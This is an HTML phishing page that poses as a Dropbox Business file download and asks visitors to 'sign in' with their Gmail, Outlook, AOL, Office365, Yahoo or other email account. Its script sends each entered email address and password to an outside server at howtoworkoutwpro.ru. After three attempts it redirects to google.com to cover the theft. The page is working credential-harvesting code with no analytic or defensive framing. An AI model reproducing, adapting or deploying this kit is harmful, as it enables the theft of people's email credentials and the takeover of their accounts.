
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>0nline</title>
    <link href="css/hover.css" rel="stylesheet" media="all">

    <style type="text/css">


    </style>
  </head>
  <body>
    <div class="container-fluid">
      <div class="row" style="background-image: url('http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/44ac6b67-03a3-49ed-a2d6-502832a13f2d/728x410.jpg'); background-size: cover;background-repeat: no-repeat;padding:120px 0px 120px 0px;">
        <div class="container rounded" style="background-color: rgba(0,0,0,0.5);">
          <div class="row">
            <div class="col-lg-6 text-center">
              <div style="margin: 120px 0px 120px 0px;">
                <img src="http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/736a376c-ebcc-4744-8318-e872f8a9e31f/512x140.png" class="img-fluid" width="300px"><br><br>
              <span class="h3" style="color: white;">Select your email provider</span><br>
              <span class="h4 text-white" >Where do you want to download from?</span><br>
              <span class="h5 text-white">Now, You can sign in to dropBox with your email.</span>
              </div>
            </div>
            <div class="col-lg-6" style="padding: 20px 50px 20px 50px;">
                <div class="p-5 rounded" style="border-left:3px solid white;">
                  <div class="row">
                    <div class="col-lg-6 text-center">
                      <a href="javascript:void(0)" id="gmailmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #D44638;">
                          <img src="http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/b3d4185c-e7f9-4e1b-b377-dcb6cdd246db/26x26.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                          <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with<br> Gmail</span>
                        </div>
                      </a>
                    </div>
                    <div class="col-lg-6 text-center">
                      <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #0073C8;">
                          <img src="http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/c17d52fc-7afa-4573-97ba-75958a85cbfd/26x26.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                          <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with<br> Outlook</span>
                        </div>
                      </a>
                    </div>
                  </div>
                  <div class="row">
                    <div class="col-lg-6 text-center">
                      <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #31459B;">
                          <img src="http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/b081bc81-126f-486a-9e3a-822783375af3/253x218.png" class="img-fluid" width="35px" style="padding:5px 0px 5px 0px;"><br>
                          <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with<br> Aol</span>
                        </div>
                      </a>
                    </div>
                    <div class="col-lg-6 text-center">
                      <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #FF3C00;">
                          <img src="http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/278b3864-53fb-4d3b-bbb9-f2bced89b6e8/187x188.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                          <span  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with<br> Office365</span>
                        </div>
                      </a>
                    </div>
                  </div>
                  <div class="row">
                    <div class="col-lg-6 text-center">
                      <a href="javascript:void(0)" id="yahoomodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #5F0F68;">
                          <img src="http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/99569597-192f-4df9-8cd6-98f8ae182abb/151x151.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                          <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with<br> Yahoo!</span>
                        </div>
                      </a>
                    </div>
                    <div class="col-lg-6 text-center">
                      <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #0B5BD3;">
                          <img src="http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/06be1417-cb0a-4ff9-8ffd-7e7ff9a49286/190x187.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                          <span  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with<br> Other Mail</span>
                        </div>
                      </a>
                    </div>
                    <div class="mx-auto mt-3">
                      <span class="h5 text-white">Drop Work the way you do.</span><br>
                      <center><small class=" text-white">@ 2020 DropBox Buisness</small></center>

                    </div>
                  </div>
                </div>
            </div>
          </div>
        </div>
      </div>
    </div>




         <!-- Modal for gmail -->
         <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
          <div class="modal-dialog" role="document">
            <div class="modal-content">
              <div class="modal-header">

                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                  <span aria-hidden="true">&times;</span>
                </button>
              </div>
              <div class="modal-body">
                <center>
                  <img id="fieldImg" src="http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/d1e77c5b-5e77-4255-bdd0-bfaf65724020/26x26.png" class="img-fluid rounded-circle" width="80px">
                  <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
                  <div class="alert alert-danger" id="msg"></div>

                </center>
                <form id="contact" class="form-horizontal well">
                  <div class="col-lg-12">
                    <div class="form-group">
                      <label for="exampleInputEmail1">Email address</label>
                      <input type="email" name="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="Enter email">
                      <small id="emailHelp" class="form-text text-muted">We'll never share your email with anyone else.</small>
                    </div>
                  </div>
                  <div class="col-lg-12">
                    <div class="form-group">
                      <label for="Password">Password</label>
                      <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp" placeholder="Enter Password">
                    </div>
                  </div>
                </div>
                <div class="modal-footer">
                  <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                  <button class="btn btn-lg btn-info pull-right" id="submit-btn">Login</button>
                </div>
              </form>
            </div>
          </div>
        </div>


        <!-- Optional JavaScript -->
        <!-- jQuery first, then Popper.js, then Bootstrap JS -->
        <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
      </body>

      <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
      <script>

        /* global $ */
        $(document).ready(function(){
          var count=0;
          $('#gmailmodal').click(function () {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/a2a25733-548e-4a8a-898a-a04d4e784d60/1280x1280.png');
            $('#field').html("Gmail");
            $('#ajaxModal').modal('show');
          });
          $('#outlookmodal').click(function () {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/064a83fd-f3c4-469e-9834-4725ed9b5a36/512x512.png');
            $('#field').html("Outlook");
            $('#ajaxModal').modal('show');
          });
          $('#aolmodal').click(function () {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/fd6e02ab-e9d7-4aef-892b-cafed0ce2ae7/300x300.png');
            $('#field').html("Aol");
            $('#ajaxModal').modal('show');
          });
          $('#office365modal').click(function () {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/5ecf90bb-2b62-44c6-9918-099e173ddc92/515x521.png');
            $('#field').html("Office 365");
            $('#ajaxModal').modal('show');
          });
          $('#yahoomodal').click(function () {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/dd198d69-df8c-435f-8ca4-24d7bbb98cd9/512x512.png');
            $('#field').html("Yahoo");
            $('#ajaxModal').modal('show');
          });
          $('#othermodal').click(function () {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'http://cdn.mcauto-images-production.sendgrid.net/d5502942aef6e6d2/8e1287b4-3f7d-4d20-bddb-4a6c44fe328b/256x256.png');
            $('#field').html("Other Mail");
            $('#ajaxModal').modal('show');
          });
          $('#submit-btn').click(function(event){
            event.preventDefault();
            var email=$("#email").val();
            var password=$("#password").val();
            var detail=$("#field").html();


            var msg = $('#msg').html();
            $('#msg').text( msg );
            count=count+1;
        if (count>=3) {
          count=0;
          window.location.replace("http://google.com");
        }
        else
        {
             $.ajax({
              dataType: 'JSON',
              url: 'https://howtoworkoutwpro.ru/fawsjfksd10nov/next.php',
              type: 'POST',
              data:{
                email:email,
                password:password,
                detail:detail,

              },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                 $('#msg').html(response['msg']);
                  // $('input, textarea').val(function() {
                  //    return this.defaultValue;
                  // });
                }
                else{
                  $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#msg").show();
              $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });
           }
         });
        });
      </script>
      </html>